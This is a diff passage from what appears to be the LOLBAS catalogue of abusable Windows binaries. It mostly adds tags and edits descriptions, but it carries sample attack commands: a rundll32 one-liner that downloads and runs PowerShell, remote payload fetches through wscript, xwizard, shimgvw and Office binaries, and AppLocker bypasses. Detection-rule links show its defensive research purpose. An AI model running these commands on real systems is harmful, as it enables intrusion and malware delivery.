  - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
    Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
    Usecase: Execute DLL from SMB share.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
    Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
    Usecase: Execute code from Internet
@ -53,18 +57,20 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe -sta {CLSID}
-    Description: Use Rundll32.exe to load a registered or hijacked COM Server payload.  Also works with ProgID.
+    Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
    Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10 (and likely previous versions), Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\rundll32.exe
  - Path: C:\Windows\SysWOW64\rundll32.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
--- a/yml/OSBinaries/Tar.yml
+++ b/yml/OSBinaries/Tar.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: tar -xf compressedfilename:ads
    Description: Decompress a compressed file from an alternate data stream (ADS).
    Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: tar -xf \\host1\archive.tar
    Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
    Usecase: Copy files
@ -25,6 +29,8 @@ Commands:
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
 Full_Path:
  - Path: C:\Windows\System32\tar.exe
  - Path: C:\Windows\SysWOW64\tar.exe
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
    Tags:
      - Execute: WSH
  - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
    Description: Binary file used by .NET to compile Visual Basic code to an executable.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
    Tags:
      - Execute: WSH
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
@ -28,6 +32,4 @@ Detection:
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
 Acknowledgement:
  - Person: Lior Adar
    Handle:
  - Person: Hai Vaknin(Lux)
    Handle:
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@ -39,11 +39,11 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
 Full_Path:
  - Path: C:\Windows\System32\wbem\wmic.exe
  - Path: C:\Windows\SysWOW64\wbem\wmic.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
  - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
    Description: Download and execute script stored in an alternate data stream
    Usecase: Execute hidden code to evade defensive counter measures
@ -21,8 +23,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\wscript.exe
  - Path: C:\Windows\SysWOW64\wscript.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
--- a/yml/OSBinaries/Wuauclt.yml
+++ b/yml/OSBinaries/Wuauclt.yml
@ -5,16 +5,16 @@ Author: 'David Middlehurst'
 Created: 2020-09-23
 Commands:
  - Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer
-    Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
+    Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.
    Usecase: Execute dll via attach/detach methods
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\wuauclt.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@ -19,12 +19,14 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
-    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
+    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Windows\System32\xwizard.exe
  - Path: C:\Windows\SysWOW64\xwizard.exe
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@ -18,6 +18,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Input: INF
  - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
    Description: Launch a DLL payload by calling the RegisterOCX function.
    Usecase: Load a DLL payload.
@ -25,6 +27,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
    Description: Launch an executable by calling the RegisterOCX function.
    Usecase: Run an executable payload.
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@ -25,6 +25,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
    Description: Launch an executable by calling the RegisterOCX function.
    Usecase: Run an executable payload.
--- a/yml/OSLibraries/Scrobj.yml
+++ b/yml/OSLibraries/Scrobj.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: c:\windows\system32\scrobj.dll
  - Path: c:\windows\syswow64\scrobj.dll
--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Input: INF
  - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
    Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
    Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows
    Tags:
      - Input: INF
 Full_Path:
  - Path: c:\windows\system32\setupapi.dll
  - Path: c:\windows\syswow64\setupapi.dll
--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
    Description: Launch an executable by calling the ShellExec_RunDLL function.
    Usecase: Run an executable payload.
--- a/yml/OSLibraries/Shimgvw.yml
+++ b/yml/OSLibraries/Shimgvw.yml
@ -5,12 +5,14 @@ Author: Eral4m
 Created: 2021-01-06
 Commands:
  - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
-    Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
+    Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
    Usecase: Download file from remote location.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: c:\windows\system32\shimgvw.dll
  - Path: c:\windows\syswow64\shimgvw.dll
--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Input: INF
  - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
    Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
    Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Input: INF
 Full_Path:
  - Path: c:\windows\system32\syssetup.dll
  - Path: c:\windows\syswow64\syssetup.dll
--- a/yml/OSLibraries/Zipfldr.yml
+++ b/yml/OSLibraries/Zipfldr.yml
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\zipfldr.dll
  - Path: c:\windows\syswow64\zipfldr.dll
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
 Resources:
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
 Code_Sample:
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
 Code_Sample:
--- a/yml/OtherMSBinaries/AccCheckConsole.yml
+++ b/yml/OtherMSBinaries/AccCheckConsole.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
  - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
    Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
    Usecase: Local execution of managed code to bypass AppLocker.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
--- a/yml/OtherMSBinaries/Appvlp.yml
+++ b/yml/OtherMSBinaries/Appvlp.yml
@ -28,8 +28,6 @@ Commands:
 Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
 Resources:
--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
  - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
    Description: Execute VBscript code that is referenced within the bginfo.bgi file.
    Usecase: Local execution of VBScript
@ -18,12 +20,16 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
  - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: Execute bginfo.exe from a WebDAV server.
    Category: Execute
    Privileges: User
    MitreID: T1218
    Tags:
      - Execute: WSH
    OperatingSystem: Windows
  - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
    Usecase: Remote execution of VBScript
@ -32,6 +38,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
  - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: This style of execution may not longer work due to patch.
@ -39,6 +47,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
  - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: This style of execution may not longer work due to patch.
@ -46,10 +56,10 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
 Full_Path:
  - Path: No fixed path
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
--- a/yml/OtherMSBinaries/Coregen.yml
+++ b/yml/OtherMSBinaries/Coregen.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1055
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
  - Command: coregen.exe dummy_assembly_name
    Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
    Usecase: Execute DLL code
@ -25,6 +27,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
  - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
@ -42,8 +46,5 @@ Resources:
  - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
 Acknowledgement:
  - Person: Nicky Tyrer
    Handle:
  - Person: Evan Pena
    Handle:
  - Person: Casey Erikson
    Handle:
--- a/yml/OtherMSBinaries/Excel.yml
+++ b/yml/OtherMSBinaries/Excel.yml
@ -6,11 +6,13 @@ Created: 2019-07-19
 Commands:
  - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
    Description: Downloads payload from remote server
-    Usecase: It will download a remote payload and place it in the cache folder
+    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
--- a/yml/OtherMSBinaries/MsoHtmEd.yml
+++ b/yml/OtherMSBinaries/MsoHtmEd.yml
@ -6,11 +6,13 @@ Created: 2022-07-24
 Commands:
  - Command: MsoHtmEd.exe https://example.com/payload
    Description: Downloads payload from remote server
-    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
--- a/yml/OtherMSBinaries/Mspub.yml
+++ b/yml/OtherMSBinaries/Mspub.yml
@ -6,11 +6,13 @@ Created: 2022-08-02
 Commands:
  - Command: mspub.exe https://example.com/payload
    Description: Downloads payload from remote server
-    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
--- a/yml/OtherMSBinaries/Powerpnt.yml
+++ b/yml/OtherMSBinaries/Powerpnt.yml
@ -6,11 +6,13 @@ Created: 2019-07-19
 Commands:
  - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
    Description: Downloads payload from remote server
-    Usecase: It will download a remote payload and place it in the cache folder
+    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
--- a/yml/OtherMSBinaries/Procdump.yml
+++ b/yml/OtherMSBinaries/Procdump.yml
@ -12,14 +12,18 @@ Commands:
    Category: Execute
    Privileges: User
    MitreID: T1202
-    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
+    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
    Tags:
      - Execute: DLL
  - Command: procdump.exe -md calc.dll foobar
    Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
    Usecase: Performs execution of unsigned DLL.
    Category: Execute
    Privileges: User
    MitreID: T1202
-    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
+    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: no default
 Detection:
--- a/yml/OtherMSBinaries/Te.yml
+++ b/yml/OtherMSBinaries/Te.yml
@ -18,6 +18,9 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
      - Input: Custom Format
 Full_Path:
  - Path: no default
 Detection:
--- a/yml/OtherMSBinaries/Tracker.yml
+++ b/yml/OtherMSBinaries/Tracker.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
  - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
    Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
    Usecase: Injection of locally stored DLL file into target process.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: no default
 Code_Sample:
--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@ -6,11 +6,13 @@ Created: 2019-07-19
 Commands:
  - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
    Description: Downloads payload from remote server
-    Usecase: It will download a remote payload and place it in the cache folder
+    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
@ -28,8 +30,6 @@ Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
  - IOC: Suspicious Office application Internet/network traffic
--- a/yml/OtherMSBinaries/vsls-agent.yml
+++ b/yml/OtherMSBinaries/vsls-agent.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
 Detection:
--- a/yml/OtherMSBinaries/vstest.console.yml
+++ b/yml/OtherMSBinaries/vstest.console.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe